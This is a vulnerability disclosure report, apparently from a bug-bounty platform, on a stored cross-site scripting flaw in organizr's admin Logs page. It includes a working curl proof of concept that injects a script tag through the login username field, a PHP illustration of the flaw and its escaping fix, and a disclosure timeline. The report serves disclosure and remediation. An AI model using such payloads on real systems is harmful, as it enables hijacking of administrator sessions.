XSS affecting "Logs" Page in causefx/organizr

Valid

Reported on

Apr 5th 2022


Description

A review of organizr's logging system found that an unauthenticated threat actor can inject arbitrary JavaScript into the "Logs" page within the administrator dashboard. In a default installation organizr logs failed login attempts. For each attempt the system stores a number of fields, one of which is the user-supplied username. This username is then returned in the "User" column directly to users with access to the "Logs" table.

Data entered into this logs table is not escaped, making it possible to inject arbitrary JavaScript directly to a user with access to the "Logs" panel. The curl command below can be used to place a payload into the Logs table. After placing the payload, log in to an account with access to the "Settings" dashboard and open the "Logs" tab. The "alert(2)" payload will fire.

Further review found that the application does not appear to enforce any limit on the payload's length. Given this, a threat actor could place complex and large payloads.

Proof of Concept

# PoC: a failed login whose username field carries the payload (shell / curl, not JavaScript)
curl 'http://localhost/api/v2/login' -X POST -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Token: null' -H 'formKey: $2y$10$7DQp3wVaXory9HSag3/qF.P8PULxQXV5kwEnwkCpsp/eZBAaVib4q' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: http://localhost' -H 'Connection: keep-alive' -H 'Referer: http://localhost/' -H 'Cookie: organizrLanguage=en; organizr_user_uuid=38a2bb5e-3cd6-4156-a8bb-4eed8be6cf36' --data-raw 'loginAttempts=1&tfaCode=&username=%3Cscript%3Ealert(2)%3B%3C%2Fscript%3E&password=asdf&remember=true&oAuth=&oAuthType=&formKey=%242y%2410%247DQp3wVaXory9HSag3%2FqF.P8PULxQXV5kwEnwkCpsp%2FeZBAaVib4q'

A review of organizr's code found that this vulnerability lies in the logging functions. The "setLoggerChannel()" function calls "setupLogger()", which passes the user-supplied username to "setTraceId()". Prior to passing the username to setTraceId(), the value should be escaped.
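The shape of the defect and of the suggested fix, as an added example that is not organizr's own code: setTraceId and the 64-character cap are hypothetical stand-ins for the functions and limit the report discusses, and the log rows are constructed.

```php
<?php
// Added example, not organizr's code. Names marked hypothetical are stand-ins.

const MAX_LOG_USERNAME = 64; // hypothetical cap; the report notes none exists

// Vulnerable shape described in the report: the raw username becomes the
// trace id, is stored, and is later rendered as HTML on the "Logs" page.
function setTraceIdVulnerable(string $username): string
{
    return $username;
}

// Hardened shape: cap the length and HTML-encode before the value reaches
// the log record. ENT_QUOTES also neutralises quotes inside attributes.
function sanitizeLogUsername(string $username): string
{
    $capped = mb_substr($username, 0, MAX_LOG_USERNAME, 'UTF-8');
    return htmlspecialchars($capped, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function setTraceIdFixed(string $username): string
{
    return sanitizeLogUsername($username);
}

// Defender check: find already-stored rows whose "user" column still
// carries markup characters, i.e. entries written before the fix.
function rowsWithMarkup(array $rows): array
{
    return array_values(array_filter(
        $rows,
        fn(array $row): bool => preg_match('/[<>"\']/', $row['user']) === 1
    ));
}

// Constructed sample rows: the report's PoC username and a benign login.
$rows = [
    ['user' => '<script>alert(2);</script>', 'result' => 'failed'],
    ['user' => 'alice',                        'result' => 'failed'],
];

echo setTraceIdVulnerable($rows[0]['user']), PHP_EOL; // stored verbatim
echo setTraceIdFixed($rows[0]['user']), PHP_EOL;      // &lt;script&gt;...
echo count(rowsWithMarkup($rows)), " suspicious row(s)", PHP_EOL;
```

Encoding at write time only protects the HTML rendering of the "Logs" page; if the same records are also read as JSON or plain text, the canonical fix is to encode at the point of output for each context, so the stored username stays raw and the template escapes it.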

Impact

Given that this vulnerability can target high level users, the impact is potentially severe. Leveraging this, a threat actor could create arbitrary users, or make malicious changes to the system.

We are processing your report and will contact the causefx/organizr team within 24 hours. 2 months ago
We have contacted a member of the causefx/organizr team and are waiting to hear back 2 months ago
We have sent a follow up to the causefx/organizr team. We will try again in 7 days. a month ago
causefx validated this vulnerability a month ago
galapag0s has been awarded the disclosure bounty
The fix bounty is now up for grabs
causefx confirmed that a fix has been merged on a42ed9 a month ago
causefx has been awarded the fix bounty